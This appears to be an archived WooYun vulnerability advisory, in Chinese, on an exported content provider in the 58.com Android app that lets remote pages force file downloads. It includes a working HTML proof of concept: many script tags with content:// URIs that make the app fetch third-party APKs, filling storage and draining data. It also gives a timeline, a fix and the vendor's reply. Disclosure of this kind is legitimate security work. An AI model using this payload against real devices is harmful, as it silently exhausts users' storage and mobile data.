当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044411

漏洞标题:58同城Android客户端远程文件写入漏洞

相关厂商:58同城

漏洞作者: x3xtxt

提交时间:2013-11-29 14:17

修复时间:2014-02-27 14:18

公开时间:2014-02-27 14:18

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-29: 细节已通知厂商并且等待厂商处理中
2013-11-29: 厂商已经确认,细节仅向厂商公开
2013-12-02: 细节向第三方安全合作伙伴开放
2014-01-23: 细节向核心白帽子及相关领域专家公开
2014-02-02: 细节向普通白帽子公开
2014-02-12: 细节向实习白帽子公开
2014-02-27: 细节向公众公开

简要描述:

58同城Android客户端Content Provider组件的实现存在缺陷,可以远程调用此接口向用户手机写入任意数据,比如:可以默默地把内存卡塞满,可以默默地把用户的流量耗尽,结果是用户不得不默默地把58客户端卸载掉。

详细说明:

58同城Android客户端中包含一个下载并缓存远程内容的Content Provider,即com.wuba.LocalFileContentProvider,此Content Provider采用默认的导出配置,即android:exported="true",任意第三方APP都可以调用此接口访问数据。该Content Provider实现了openFile()接口,通过此接口可以访问外部网络中的数据,并将其缓存到私有目录/data/data/com.wuba/wbcache目录中。调用此接口可以向/data/data/com.wuba/wbcache目录无限制填充数据,Android没有明确指明分配给每个APP的私有存储空间,因此,可以写满整个内存卡,导致手机不能正常使用,当然,也可以默默地把用户手机流量耗尽。

漏洞证明:

使用浏览器(支持content://)打开包含如下内容的链接,浏览器就会调用58同城客户端APP对应的Content Provider组件下载并缓存远程的文件,作为示例,仅仅让它下载一些apk文件。

<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8" />
    <title>58 Content Provider File Operations PoC</title>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://file.m.163.com/app/free/201309/25/com.rovio.angrybirdsstarwarsii.premium_1020.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/928b341dc0b94f3a/zhiwudazhanjiangshi2gaoqing_4.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/4e67b9f0384ee4dd/renjiang_12.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://bs.baidu.com/appstore/apk_AC94C669DEC40B8F50DA9A9221752592.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/42cff8368e556f27/fengkuangdelaonainai_139.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://cdn.market.hiapk.com/data/upload/2013/09_07/2/com.ddstudio.pushdoll_020716.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://www.apk.anzhi.com/data1/apk/201309/27/com.toccata.games.kkdfvndjvdfge18_87500200.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://www.apk.anzhi.com/data1/apk/201309/29/com.chillingo.totemrunner.android.ajagplay_63022000.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/7e78cb8aa3110315/dazhangmen_21.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://file.m.163.com/app/free/201309/25/com.puzzle_wolf.game_69.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/c5f698e149f63522/cangqiongzhijian_10103.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://file.m.163.com/app/free/201309/19/com.obv.google.monstergemisland_5.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://file.m.163.com/app/free/201309/25/com.rovio.angrybirdsstarwarsii.premium_1020.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/928b341dc0b94f3a/zhiwudazhanjiangshi2gaoqing_4.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/538699f8012d85fb/wuxiaQchuan_9.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://cdn.market.hiapk.com/data/upload//2013/10_09/16/com.djinnworks.StickmanDownhill_165723.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/785ff9b7a5a05fd6/shikonglieren_44.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://static.nduoa.com/apk/610/610752/1327991/com.djinnworks.StickStuntBiker2.free.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/4e67b9f0384ee4dd/renjiang_12.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://bs.baidu.com/appstore/apk_AC94C669DEC40B8F50DA9A9221752592.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/9772a815413b7a20/yaojisanguo_7602.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://www.apk.anzhi.com/data1/apk/201310/11/com.doublefine.rednaers_21702800.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/d1c10bd03497bbb1/BottleCap_122.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://bs.baidu.com/appstore/apk_E6D3382E30FB5562EA07E3E865D32086.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/65343e8d1b984faa/wojiaoMT_3102.apk?cachevers=58.tieyou.com" defer="defer"></script>
    <script type="text/javascript" src="content://com.wuba.hybrid.localfile/1.http://gdown.baidu.com/data/wisegame/3d43cff7e9e88120/YYshuihu_3.apk?cachevers=58.tieyou.com" defer="defer"></script>
</head>
<body>
  <h1>58 Content Provider File Operations PoC</h1>  
</body>
</html>

修复方案:

凡只用于内部调用的组件,导出配置都应该设置为false,即android:exported="false"。

版权声明:转载请注明来源 x3xtxt@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-11-29 16:22

厂商回复:

感谢对58同城安全的关注,我们会尽快修复处理!

最新状态:

暂无